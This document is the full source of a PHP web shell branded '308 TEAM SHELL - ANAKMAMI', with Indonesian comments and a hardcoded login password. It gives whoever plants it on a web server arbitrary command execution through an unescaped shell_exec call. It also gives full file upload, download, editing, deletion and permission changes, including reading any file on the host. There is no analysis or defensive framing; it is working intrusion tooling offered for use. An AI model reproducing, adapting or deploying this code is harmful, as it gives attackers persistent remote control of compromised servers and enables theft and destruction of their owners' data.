<?php
session_start();

// PASSWORD (ubah sesuai kebutuhan)
define('PASS', 'kunciRahasia123');

// Simple login system
if (isset($_GET['logout'])) {
    session_destroy();
    header("Location: ".$_SERVER['PHP_SELF']);
    exit;
}

if (!isset($_SESSION['logged_in'])) {
    if (isset($_POST['pass']) && $_POST['pass'] === PASS) {
        $_SESSION['logged_in'] = true;
    } else {
        // Login form
        echo '<!DOCTYPE html>
        <html lang="en">
        <head>
            <meta charset="UTF-8">
            <title>308 TEAM SHELL - ANAKMAMI | Login</title>
            <style>
                body {
                    background: #0a0a12;
                    display: flex;
                    justify-content: center;
                    align-items: center;
                    height: 100vh;
                    margin: 0;
                    font-family: "Courier New", monospace;
                    color: #fff;
                }
                .login-box {
                    background: rgba(10, 10, 30, 0.8);
                    border: 1px solid #7b2be8;
                    box-shadow: 0 0 20px #7b2be8, 
                                0 0 40px #7b2be8,
                                inset 0 0 10px #7b2be8;
                    padding: 40px;
                    border-radius: 10px;
                    width: 300px;
                    text-align: center;
                }
                .login-box h2 {
                    color: #7b2be8;
                    text-shadow: 0 0 10px #7b2be8;
                    margin-bottom: 30px;
                    font-weight: bold;
                }
                .login-box input {
                    width: 100%;
                    padding: 12px;
                    margin: 10px 0;
                    background: rgba(0,0,0,0.5);
                    border: 1px solid #7b2be8;
                    color: #0f0;
                    font-family: "Courier New", monospace;
                    border-radius: 5px;
                    outline: none;
                }
                .login-box button {
                    width: 100%;
                    padding: 12px;
                    background: linear-gradient(45deg, #7b2be8, #0f0);
                    border: none;
                    color: #fff;
                    font-weight: bold;
                    border-radius: 5px;
                    cursor: pointer;
                    margin-top: 20px;
                    transition: all 0.3s;
                }
                .login-box button:hover {
                    background: linear-gradient(45deg, #0f0, #7b2be8);
                    box-shadow: 0 0 15px #0f0;
                }
                .brand {
                    font-size: 24px;
                    margin-bottom: 30px;
                    color: #7b2be8;
                    text-shadow: 0 0 10px #7b2be8;
                }
                .brand span {
                    color: #0f0;
                    text-shadow: 0 0 10px #0f0;
                }
            </style>
        </head>
        <body>
            <div class="login-box">
                <div class="brand">308 <span>TEAM SHELL</span> - ANAKMAMI</div>
                <h2>Secure Access</h2>
                <form method="post">
                    <input type="password" name="pass" placeholder="Enter Password" autofocus required />
                    <button type="submit">AUTHENTICATE</button>
                </form>
            </div>
        </body>
        </html>';
        exit;
    }
}

// Utility Functions

function safePath($path) {
    $real = realpath($path);
    return $real ? $real : false;
}

function listDir($dir) {
    $files = @scandir($dir);
    if ($files === false) return [];
    $list = [];
    foreach ($files as $file) {
        if ($file === '.' || $file === '..') continue;
        $fullpath = $dir . DIRECTORY_SEPARATOR . $file;
        $list[] = [
            'name' => $file,
            'path' => $fullpath,
            'is_dir' => is_dir($fullpath),
            'size' => filesize($fullpath),
            'perm' => substr(sprintf('%o', fileperms($fullpath)), -4),
        ];
    }
    return $list;
}

function makeBreadcrumb($path) {
    $path = safePath($path);
    if ($path === false) return '';
    $parts = explode(DIRECTORY_SEPARATOR, trim($path, DIRECTORY_SEPARATOR));
    $build = (DIRECTORY_SEPARATOR === '\\') ? '' : DIRECTORY_SEPARATOR;
    $html = '<nav class="breadcrumb">';
    $html .= '<a href="?dir=.' . '">home</a>';
    foreach ($parts as $part) {
        if ($part === '') continue;
        $build = rtrim($build, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $part;
        $html .= ' / <a href="?dir=' . urlencode($build) . '">' . htmlspecialchars($part) . '</a>';
    }
    $html .= '</nav>';
    return $html;
}

function humanFilesize($bytes, $decimals = 2) {
    $size = ['B', 'KB', 'MB', 'GB', 'TB'];
    $factor = floor((strlen($bytes) - 1) / 3);
    if ($factor == 0) return $bytes . ' ' . $size[0];
    return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . ' ' . $size[$factor];
}

// Current directory
$dir = isset($_REQUEST['dir']) ? $_REQUEST['dir'] : '.';
$realDir = safePath($dir);
if ($realDir === false) $realDir = '.';

// Handling actions
$action = $_POST['action'] ?? '';

$msg = '';
if ($action === 'upload' && isset($_FILES['file'])) {
    $uploadFile = $realDir . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
    if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile)) {
        $msg = "File uploaded successfully.";
    } else {
        $msg = "Failed to upload file.";
    }
}

if ($action === 'delete' && isset($_POST['target'])) {
    $target = safePath($_POST['target']);
    if ($target && strpos($target, $realDir) === 0) {
        if (is_dir($target)) {
            $msg = @rmdir($target) ? "Folder deleted." : "Failed to delete folder (not empty?).";
        } else {
            $msg = @unlink($target) ? "File deleted." : "Failed to delete file.";
        }
    } else {
        $msg = "Invalid path.";
    }
}

if ($action === 'rename' && isset($_POST['target']) && isset($_POST['newname'])) {
    $target = safePath($_POST['target']);
    $newname = basename($_POST['newname']);
    $newpath = dirname($target) . DIRECTORY_SEPARATOR . $newname;
    if ($target && strpos($target, $realDir) === 0) {
        $msg = rename($target, $newpath) ? "Renamed successfully." : "Failed to rename.";
    } else {
        $msg = "Invalid path.";
    }
}

if ($action === 'mkdir' && !empty($_POST['foldername'])) {
    $newfolder = $realDir . DIRECTORY_SEPARATOR . basename($_POST['foldername']);
    if (!file_exists($newfolder)) {
        $msg = mkdir($newfolder) ? "Folder created." : "Failed to create folder.";
    } else {
        $msg = "Folder already exists.";
    }
}

if ($action === 'newfile' && !empty($_POST['filename'])) {
    $newfile = $realDir . DIRECTORY_SEPARATOR . basename($_POST['filename']);
    if (!file_exists($newfile)) {
        $msg = file_put_contents($newfile, '') !== false ? "File created." : "Failed to create file.";
    } else {
        $msg = "File already exists.";
    }
}

if ($action === 'edit' && isset($_POST['target']) && isset($_POST['content'])) {
    $target = safePath($_POST['target']);
    if ($target && strpos($target, $realDir) === 0 && is_file($target) && is_writable($target)) {
        $content = $_POST['content'];
        $result = file_put_contents($target, $content);
        $msg = $result !== false ? "File saved." : "Failed to save file.";
    } else {
        $msg = "Invalid path or permission denied.";
    }
}

if ($action === 'chmod' && isset($_POST['target']) && isset($_POST['perm'])) {
    $target = safePath($_POST['target']);
    $perm = intval($_POST['perm'], 8);
    if ($target && strpos($target, $realDir) === 0) {
        $msg = chmod($target, $perm) ? "Permissions changed." : "Failed to change permissions.";
    } else {
        $msg = "Invalid path.";
    }
}

if ($action === 'shellcmd' && !empty($_POST['command'])) {
    $cmd = $_POST['command']; // supaya user bisa gunakan >, | dll (tanpa escapeshellcmd)
    $output = shell_exec($cmd . " 2>&1");
    if (strlen($output) > 4000) {
        $output = substr($output, 0, 4000) . "\n...[output truncated]...";
    }
}

if (isset($_GET['download']) && $_GET['download'] !== '') {
    $file = safePath($_GET['download']);
    if ($file && is_file($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file).'"');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}

// List folder contents
$items = listDir($realDir);

?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>308 TEAM SHELL - ANAKMAMI</title>
<style>
:root {
    --neon-purple: #7b2be8;
    --neon-green: #0f0;
    --dark-bg: #0a0a12;
    --darker-bg: #050508;
    --panel-bg: rgba(15, 15, 25, 0.8);
}

body {
    font-family: 'Courier New', monospace;
    background: var(--dark-bg);
    margin: 0;
    padding: 20px;
    color: #fff;
    background-image: 
        radial-gradient(circle at 10% 20%, rgba(123, 43, 232, 0.1) 0%, transparent 20%),
        radial-gradient(circle at 90% 80%, rgba(0, 255, 0, 0.1) 0%, transparent 20%);
}

.brand-header {
    font-size: 28px;
    margin-bottom: 20px;
    padding-bottom: 10px;
    border-bottom: 1px solid var(--neon-purple);
    text-shadow: 0 0 10px var(--neon-purple);
    color: var(--neon-purple);
    display: flex;
    justify-content: space-between;
    align-items: center;
}

.brand-header span {
    color: var(--neon-green);
    text-shadow: 0 0 10px var(--neon-green);
}

.top-bar {
    margin-bottom: 20px;
    display: flex;
    gap: 15px;
    align-items: center;
}

.top-bar a {
    color: var(--neon-purple);
    text-decoration: none;
    font-weight: bold;
    padding: 5px 10px;
    border: 1px solid var(--neon-purple);
    border-radius: 5px;
    transition: all 0.3s;
}

.top-bar a:hover {
    background: var(--neon-purple);
    color: #000;
    box-shadow: 0 0 15px var(--neon-purple);
}

.current-path {
    background: var(--panel-bg);
    padding: 10px;
    border-radius: 5px;
    border-left: 3px solid var(--neon-green);
    margin-bottom: 15px;
    font-family: monospace;
    color: var(--neon-green);
}

.breadcrumb {
    margin-bottom: 15px;
    font-size: 14px;
    display: flex;
    flex-wrap: wrap;
    gap: 5px;
}

.breadcrumb a {
    color: var(--neon-purple);
    text-decoration: none;
    padding: 3px 8px;
    border-radius: 3px;
    transition: all 0.3s;
}

.breadcrumb a:hover {
    background: rgba(123, 43, 232, 0.2);
    text-decoration: none;
    box-shadow: 0 0 10px rgba(123, 43, 232, 0.5);
}

.breadcrumb .separator {
    color: var(--neon-green);
}

#filelist {
    background: var(--panel-bg);
    border: 1px solid var(--neon-purple);
    border-radius: 8px;
    padding: 10px;
    max-height: 400px;
    overflow-y: auto;
    margin-bottom: 20px;
    box-shadow: 0 0 20px rgba(123, 43, 232, 0.3);
}

#filelist::-webkit-scrollbar {
    width: 8px;
}

#filelist::-webkit-scrollbar-track {
    background: var(--darker-bg);
}

#filelist::-webkit-scrollbar-thumb {
    background: var(--neon-purple);
    border-radius: 4px;
}

.item {
    padding: 8px 12px;
    margin: 3px 0;
    border-radius: 5px;
    display: flex;
    align-items: center;
    transition: all 0.2s;
}

.item:hover {
    background: rgba(123, 43, 232, 0.1);
}

.item.folder {
    color: var(--neon-purple);
}

.item.file {
    color: #ccc;
}

.item.selected {
    background: rgba(123, 43, 232, 0.3);
    box-shadow: 0 0 10px rgba(123, 43, 232, 0.5);
    color: #fff;
}

.item strong {
    flex-grow: 1;
    margin-left: 10px;
}

.item small {
    color: #888;
    font-size: 12px;
    margin-right: 15px;
}

.item a {
    color: var(--neon-green);
    text-decoration: none;
    margin: 0 5px;
    padding: 3px 8px;
    border-radius: 3px;
    transition: all 0.3s;
}

.item a:hover {
    background: rgba(0, 255, 0, 0.1);
    text-decoration: none;
    box-shadow: 0 0 10px rgba(0, 255, 0, 0.3);
}

.action-panel {
    background: var(--panel-bg);
    border: 1px solid var(--neon-purple);
    border-radius: 8px;
    padding: 15px;
    margin-bottom: 20px;
    box-shadow: 0 0 20px rgba(123, 43, 232, 0.3);
}

.action-panel h3 {
    margin-top: 0;
    color: var(--neon-purple);
    border-bottom: 1px solid rgba(123, 43, 232, 0.5);
    padding-bottom: 8px;
}

.form-group {
    margin-bottom: 15px;
}

.form-group label {
    display: block;
    margin-bottom: 5px;
    color: var(--neon-green);
}

input[type="text"], 
input[type="password"], 
input[type="number"],
input[type="file"] {
    width: 100%;
    padding: 10px;
    background: rgba(0,0,0,0.5);
    border: 1px solid var(--neon-purple);
    color: var(--neon-green);
    font-family: 'Courier New', monospace;
    border-radius: 5px;
    margin-bottom: 10px;
}

textarea {
    width: 100%;
    height: 300px;
    background: rgba(0,0,0,0.5);
    border: 1px solid var(--neon-purple);
    color: var(--neon-green);
    font-family: monospace;
    padding: 10px;
    border-radius: 5px;
    resize: vertical;
}

button, .btn {
    padding: 10px 15px;
    background: linear-gradient(45deg, var(--neon-purple), var(--neon-green));
    border: none;
    color: #000;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: all 0.3s;
    font-family: 'Courier New', monospace;
}

button:hover, .btn:hover {
    background: linear-gradient(45deg, var(--neon-green), var(--neon-purple));
    box-shadow: 0 0 15px var(--neon-green);
}

.btn-danger {
    background: linear-gradient(45deg, #f00, #d12be8);
}

.btn-danger:hover {
    background: linear-gradient(45deg, #d12be8, #f00);
    box-shadow: 0 0 15px #f00;
}

#shell-output {
    background: rgba(0,0,0,0.7);
    border: 1px solid var(--neon-green);
    color: var(--neon-green);
    padding: 15px;
    border-radius: 8px;
    font-family: monospace;
    white-space: pre-wrap;
    max-height: 300px;
    overflow-y: auto;
    margin-top: 15px;
    box-shadow: 0 0 20px rgba(0, 255, 0, 0.2);
}

.status-message {
    padding: 10px;
    margin-bottom: 15px;
    border-radius: 5px;
    background: rgba(0, 255, 0, 0.1);
    border-left: 3px solid var(--neon-green);
    color: var(--neon-green);
}

.permission-form, .rename-form, .delete-form {
    display: inline-flex;
    align-items: center;
    margin-left: 10px;
}

.permission-form input[type="text"] {
    width: 60px;
    margin: 0 5px;
}

.quick-actions {
    display: flex;
    flex-wrap: wrap;
    gap: 15px;
    margin-bottom: 20px;
}

.quick-action {
    background: var(--panel-bg);
    border: 1px solid var(--neon-purple);
    border-radius: 5px;
    padding: 15px;
    flex: 1 1 calc(33.333% - 30px);
    min-width: 250px;
    box-sizing: border-box;
}

.quick-action h4 {
    margin: 0 0 15px 0;
    color: var(--neon-purple);
    border-bottom: 1px solid rgba(123, 43, 232, 0.3);
    padding-bottom: 8px;
    display: flex;
    align-items: center;
    gap: 8px;
}

.quick-form {
    display: flex;
    flex-direction: column;
    gap: 12px;
}

.quick-form input:not([type="hidden"]),
.quick-form input[type="file"] {
    width: 100%;
    padding: 8px 12px;
    border: 1px solid var(--neon-purple);
    border-radius: 4px;
    background: rgba(123, 43, 232, 0.1);
    color: white;
    box-sizing: border-box;
}

.quick-form input[type="file"] {
    padding: 5px;
    cursor: pointer;
}

.quick-form input::placeholder {
    color: rgba(255, 255, 255, 0.5);
}

.quick-form button {
    padding: 8px 12px;
    background: var(--neon-purple);
    color: white;
    border: none;
    border-radius: 4px;
    cursor: pointer;
    font-weight: bold;
    transition: background 0.2s;
}

.quick-form button:hover {
    background: #8a2be2;
}

@media (max-width: 768px) {
    .quick-actions {
        flex-direction: column;
    }
    
    .permission-form, .rename-form, .delete-form {
        display: block;
        margin: 5px 0;
    }
}
</style>
</head>
<body>

<div class="brand-header">
    <div>308 <span>TEAM SHELL</span> - ANAKMAMI</div>
    <div class="top-bar">
        <a href="?"><i class="fas fa-home"></i> HOME</a>
        <a href="?logout=1"><i class="fas fa-sign-out-alt"></i> LOGOUT</a>
    </div>
</div>

<div class="current-path">
    <i class="fas fa-folder-open"></i> <?php echo htmlspecialchars($realDir); ?>
</div>

<?php echo makeBreadcrumb($realDir); ?>

<?php if ($msg !== ''): ?>
    <div class="status-message">
        <i class="fas fa-info-circle"></i> <?php echo htmlspecialchars($msg); ?>
    </div>
<?php endif; ?>

<div class="quick-actions">
    <div class="quick-action">
        <h4><i class="fas fa-upload"></i> Upload File</h4>
        <form method="post" enctype="multipart/form-data" class="quick-form">
            <input type="hidden" name="action" value="upload" />
            <input type="file" name="file" required />
            <button type="submit">UPLOAD</button>
        </form>
    </div>
    
    <div class="quick-action">
        <h4><i class="fas fa-folder-plus"></i> Create Folder</h4>
        <form method="post" class="quick-form">
            <input type="hidden" name="action" value="mkdir" />
            <input type="text" name="foldername" placeholder="Folder name" required />
            <button type="submit">CREATE</button>
        </form>
    </div>
    
    <div class="quick-action">
        <h4><i class="fas fa-file-alt"></i> Create File</h4>
        <form method="post" class="quick-form">
            <input type="hidden" name="action" value="newfile" />
            <input type="text" name="filename" placeholder="File name" required />
            <button type="submit">CREATE</button>
        </form>
    </div>
</div>

<div id="filelist" tabindex="0" aria-label="Folder listing">
    <?php foreach ($items as $i => $item): ?>
        <div class="item <?php echo $item['is_dir'] ? 'folder' : 'file'; ?>"
             data-path="<?php echo htmlspecialchars($item['path']); ?>"
             data-isdir="<?php echo $item['is_dir'] ? '1' : '0'; ?>"
             data-index="<?php echo $i; ?>">
            <i class="fas <?php echo $item['is_dir'] ? 'fa-folder' : 'fa-file'; ?>"></i>
            <strong><?php echo htmlspecialchars($item['name']); ?></strong>
            <small><?php echo $item['perm']; ?>, <?php echo humanFilesize($item['size']); ?></small>
            
            <?php if (!$item['is_dir']): ?>
                <a href="?download=<?php echo urlencode($item['path']); ?>"><i class="fas fa-download"></i> Download</a>
            <?php endif; ?>

            <form method="post" class="rename-form">
                <input type="hidden" name="action" value="rename" />
                <input type="hidden" name="target" value="<?php echo htmlspecialchars($item['path']); ?>" />
                <input type="text" name="newname" placeholder="New name" required />
                <button type="submit"><i class="fas fa-edit"></i> Rename</button>
            </form>

            <form method="post" class="delete-form" onsubmit="return confirm('Delete <?php echo htmlspecialchars(addslashes($item['name'])); ?>?');">
                <input type="hidden" name="action" value="delete" />
                <input type="hidden" name="target" value="<?php echo htmlspecialchars($item['path']); ?>" />
                <button type="submit" class="btn-danger"><i class="fas fa-trash"></i> Delete</button>
            </form>

            <form method="post" class="permission-form">
                <input type="hidden" name="action" value="chmod" />
                <input type="hidden" name="target" value="<?php echo htmlspecialchars($item['path']); ?>" />
                <input type="text" name="perm" placeholder="Perm" maxlength="4" value="<?php echo $item['perm']; ?>" required />
                <button type="submit"><i class="fas fa-lock"></i> Chmod</button>
            </form>

            <?php if (!$item['is_dir']): ?>
                <a href="?dir=<?php echo urlencode($realDir); ?>&edit=<?php echo urlencode($item['path']); ?>"><i class="fas fa-code"></i> Edit</a>
            <?php endif; ?>
        </div>
    <?php endforeach; ?>
</div>

<?php if (isset($_GET['edit'])):
    $editFile = safePath($_GET['edit']);
    if ($editFile && strpos($editFile, $realDir) === 0 && is_file($editFile)):
        $content = file_get_contents($editFile);
?>
    <div class="action-panel">
        <h3><i class="fas fa-edit"></i> Edit File: <?php echo htmlspecialchars($editFile); ?></h3>
        <form method="post">
            <input type="hidden" name="action" value="edit" />
            <input type="hidden" name="target" value="<?php echo htmlspecialchars($editFile); ?>" />
            <textarea name="content"><?php echo htmlspecialchars($content); ?></textarea><br/>
            <button type="submit"><i class="fas fa-save"></i> Save</button>
            <a href="?dir=<?php echo urlencode($realDir); ?>" class="btn"><i class="fas fa-times"></i> Cancel</a>
        </form>
    </div>
<?php else: ?>
    <div class="status-message" style="border-color: #f00; color: #f00;">
        <i class="fas fa-exclamation-triangle"></i> Invalid file path.
    </div>
<?php endif; endif; ?>

<div class="action-panel">
    <h3><i class="fas fa-terminal"></i> Command Execution</h3>
    <form method="post" onsubmit="return confirm('Execute shell command?');">
        <input type="hidden" name="action" value="shellcmd" />
        <div class="form-group">
            <label for="command"><i class="fas fa-keyboard"></i> Enter Command:</label>
            <input type="text" name="command" id="command" placeholder="Enter command" required />
        </div>
        <button type="submit"><i class="fas fa-play"></i> Execute</button>
    </form>
    
    <?php if (isset($output)): ?>
        <div id="shell-output">
            <div style="color: var(--neon-purple); margin-bottom: 10px;">
                <i class="fas fa-angle-right"></i> Command Output:
            </div>
            <?php echo htmlspecialchars($output); ?>
        </div>
    <?php endif; ?>
</div>

<script src="https://kit.fontawesome.com/a076d05399.js" crossorigin="anonymous"></script>
<script>
const filelist = document.getElementById('filelist');
let items = filelist.querySelectorAll('.item');
let selectedIndex = 0;

function selectItem(index) {
    if (index < 0) index = 0;
    if (index >= items.length) index = items.length - 1;
    items[selectedIndex]?.classList.remove('selected');
    selectedIndex = index;
    items[selectedIndex]?.classList.add('selected');
    items[selectedIndex]?.scrollIntoView({ block: 'nearest' });
}

filelist.addEventListener('keydown', function(e) {
    if (e.key === "ArrowDown") {
        e.preventDefault();
        if (selectedIndex < items.length - 1) {
            selectItem(selectedIndex + 1);
        }
    } else if (e.key === "ArrowUp") {
        e.preventDefault();
        if (selectedIndex > 0) {
            selectItem(selectedIndex - 1);
        }
    } else if (e.key === "Enter") {
        e.preventDefault();
        let selected = items[selectedIndex];
        if (selected?.dataset.isdir === "1") {
            let path = encodeURIComponent(selected.dataset.path);
            window.location.href = `?dir=${path}`;
        } else if (selected) {
            window.location.href = `?dir=${encodeURIComponent('<?php echo addslashes($realDir); ?>')}&edit=${encodeURIComponent(selected.dataset.path)}`;
        }
    }
});

// Pilih item pertama saat load
if (items.length > 0) {
    selectItem(0);
    filelist.focus();
}
</script>

</body>
</html>